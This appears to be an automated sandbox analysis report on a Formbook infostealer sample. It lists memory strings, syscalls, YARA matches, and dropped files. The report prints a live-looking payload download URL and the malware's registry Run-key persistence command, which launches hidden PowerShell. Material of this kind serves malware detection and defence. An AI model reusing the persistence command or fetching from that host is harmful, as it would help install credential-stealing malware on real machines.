        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: Overfondle.exe, 00000008.00000003.2065621481.0000000004465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kraljevikonaci.rs/
        Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2170479484.0000000004456000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2063617167.000000000448A000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2170621912.000000000448A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.bin
        Source: Overfondle.exe, 00000008.00000003.2065581113.0000000004487000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065735532.000000000447B000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2063617167.000000000448A000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2170621912.000000000448A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.bin5?
        Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.binY
        Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.bins
        Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
        Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
        Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
        Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
        Source: cmd.exe, 0000000E.00000003.2349353225.0000000007982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
        Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownHTTPS traffic detected: 195.252.110.253:443 -> 192.168.2.10:49706 version: TLS 1.2
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_004054B6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004054B6

        E-Banking Fraud

        Source: Yara matchFile source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Overfondle.exe
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_204A2C70
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_204A2DF0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A35C0 NtCreateMutant,LdrInitializeThunk,8_2_204A35C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A4340 NtSetContextThread,8_2_204A4340
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A4650 NtSuspendThread,8_2_204A4650
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2AD0 NtReadFile,8_2_204A2AD0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2AF0 NtWriteFile,8_2_204A2AF0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2AB0 NtWaitForSingleObject,8_2_204A2AB0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2B60 NtClose,8_2_204A2B60
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2BE0 NtQueryValueKey,8_2_204A2BE0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2BF0 NtAllocateVirtualMemory,8_2_204A2BF0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2B80 NtQueryInformationFile,8_2_204A2B80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2BA0 NtEnumerateValueKey,8_2_204A2BA0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2C60 NtCreateKey,8_2_204A2C60
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2C00 NtQueryInformationProcess,8_2_204A2C00
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2CC0 NtQueryVirtualMemory,8_2_204A2CC0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2CF0 NtOpenProcess,8_2_204A2CF0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2CA0 NtQueryInformationToken,8_2_204A2CA0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2D00 NtSetInformationFile,8_2_204A2D00
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2D10 NtMapViewOfSection,8_2_204A2D10
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2D30 NtUnmapViewOfSection,8_2_204A2D30
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2DD0 NtDelayExecution,8_2_204A2DD0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2DB0 NtEnumerateKey,8_2_204A2DB0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2E30 NtWriteVirtualMemory,8_2_204A2E30
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2EE0 NtQueueApcThread,8_2_204A2EE0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2E80 NtReadVirtualMemory,8_2_204A2E80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2EA0 NtAdjustPrivilegesToken,8_2_204A2EA0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2F60 NtCreateProcessEx,8_2_204A2F60
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2F30 NtCreateSection,8_2_204A2F30
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2FE0 NtCreateFile,8_2_204A2FE0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2F90 NtProtectVirtualMemory,8_2_204A2F90
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2FA0 NtQuerySection,8_2_204A2FA0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2FB0 NtResumeThread,8_2_204A2FB0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A3010 NtOpenDirectoryObject,8_2_204A3010
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A3090 NtSetValueKey,8_2_204A3090
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A4340 NtSetContextThread,LdrInitializeThunk,14_2_031A4340
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A4650 NtSuspendThread,LdrInitializeThunk,14_2_031A4650
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2B60 NtClose,LdrInitializeThunk,14_2_031A2B60
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2AD0 NtReadFile,LdrInitializeThunk,14_2_031A2AD0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2AF0 NtWriteFile,LdrInitializeThunk,14_2_031A2AF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2F30 NtCreateSection,LdrInitializeThunk,14_2_031A2F30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2FB0 NtResumeThread,LdrInitializeThunk,14_2_031A2FB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2FE0 NtCreateFile,LdrInitializeThunk,14_2_031A2FE0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2EE0 NtQueueApcThread,LdrInitializeThunk,14_2_031A2EE0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2D10 NtMapViewOfSection,LdrInitializeThunk,14_2_031A2D10
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2D30 NtUnmapViewOfSection,LdrInitializeThunk,14_2_031A2D30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2DD0 NtDelayExecution,LdrInitializeThunk,14_2_031A2DD0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_031A2DF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_031A2C70
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2C60 NtCreateKey,LdrInitializeThunk,14_2_031A2C60
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_031A2CA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A35C0 NtCreateMutant,LdrInitializeThunk,14_2_031A35C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A39B0 NtGetContextThread,LdrInitializeThunk,14_2_031A39B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2B80 NtQueryInformationFile,14_2_031A2B80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2BA0 NtEnumerateValueKey,14_2_031A2BA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2BF0 NtAllocateVirtualMemory,14_2_031A2BF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2BE0 NtQueryValueKey,14_2_031A2BE0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2AB0 NtWaitForSingleObject,14_2_031A2AB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2F60 NtCreateProcessEx,14_2_031A2F60
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2F90 NtProtectVirtualMemory,14_2_031A2F90
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2FA0 NtQuerySection,14_2_031A2FA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2E30 NtWriteVirtualMemory,14_2_031A2E30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2E80 NtReadVirtualMemory,14_2_031A2E80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2EA0 NtAdjustPrivilegesToken,14_2_031A2EA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2D00 NtSetInformationFile,14_2_031A2D00
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2DB0 NtEnumerateKey,14_2_031A2DB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2C00 NtQueryInformationProcess,14_2_031A2C00
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2CC0 NtQueryVirtualMemory,14_2_031A2CC0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2CF0 NtOpenProcess,14_2_031A2CF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A3010 NtOpenDirectoryObject,14_2_031A3010
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A3090 NtSetValueKey,14_2_031A3090
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A3D10 NtOpenProcessToken,14_2_031A3D10
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A3D70 NtOpenThread,14_2_031A3D70
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003E7730 NtCreateFile,14_2_003E7730
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003E7890 NtReadFile,14_2_003E7890
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003E7970 NtDeleteFile,14_2_003E7970
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003E7A10 NtClose,14_2_003E7A10
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B3
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeFile created: C:\Windows\SysWOW64\psiloses.lnk
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_0040727F0_2_0040727F
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_00406AA80_2_00406AA8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_033DF1082_2_033DF108
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_033DF9D82_2_033DF9D8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_033DEDC02_2_033DEDC0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_079689702_2_07968970
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205020008_2_20502000
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F81588_2_204F8158
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204601008_2_20460100
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050A1188_2_2050A118
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205281CC8_2_205281CC
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205241A28_2_205241A2
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205301AA8_2_205301AA
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205102748_2_20510274
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F02C08_2_204F02C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052A3528_2_2052A352
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205303E68_2_205303E6
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047E3F08_2_2047E3F0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205224468_2_20522446
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205144208_2_20514420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2051E4F68_2_2051E4F6
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204705358_2_20470535
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205305918_2_20530591
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048C6E08_2_2048C6E0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204947508_2_20494750
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204707708_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046C7C08_2_2046C7C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047A8408_2_2047A840
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204728408_2_20472840
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E8F08_2_2049E8F0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204568B88_2_204568B8
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204869628_2_20486962
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A08_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2053A9A68_2_2053A9A6
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046EA808_2_2046EA80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052AB408_2_2052AB40
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20526BD78_2_20526BD7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470C008_2_20470C00
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20460CF28_2_20460CF2
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20510CB58_2_20510CB5
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047AD008_2_2047AD00
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050CD1F8_2_2050CD1F
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046ADE08_2_2046ADE0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20488DBF8_2_20488DBF
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470E598_2_20470E59
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052EE268_2_2052EE26
Source: Joe Sandbox View  Dropped File: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll 10675F13ABAEE592F14382349AA35D82FB52AAB4E27EEF61D0C83DEC1F6B73DA
Source: C:\Windows\SysWOW64\cmd.exe  Code function: String function: 031EF290 appears 105 times
Source: C:\Windows\SysWOW64\cmd.exe  Code function: String function: 0315B970 appears 283 times
Source: C:\Windows\SysWOW64\cmd.exe  Code function: String function: 031A5130 appears 58 times
Source: C:\Windows\SysWOW64\cmd.exe  Code function: String function: 031DEA12 appears 86 times
Source: C:\Windows\SysWOW64\cmd.exe  Code function: String function: 031B7E54 appears 100 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Code function: String function: 204B7E54 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Code function: String function: 204A5130 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Code function: String function: 204DEA12 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Code function: String function: 204EF290 appears 80 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe  Code function: String function: 2045B970 appears 111 times
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp  Binary or memory string: OriginalFilenameblegrde.exeDVarFileInfo$ vs SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Binary or memory string: OriginalFilenameblegrde.exeDVarFileInfo$ vs SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe  Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
Source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
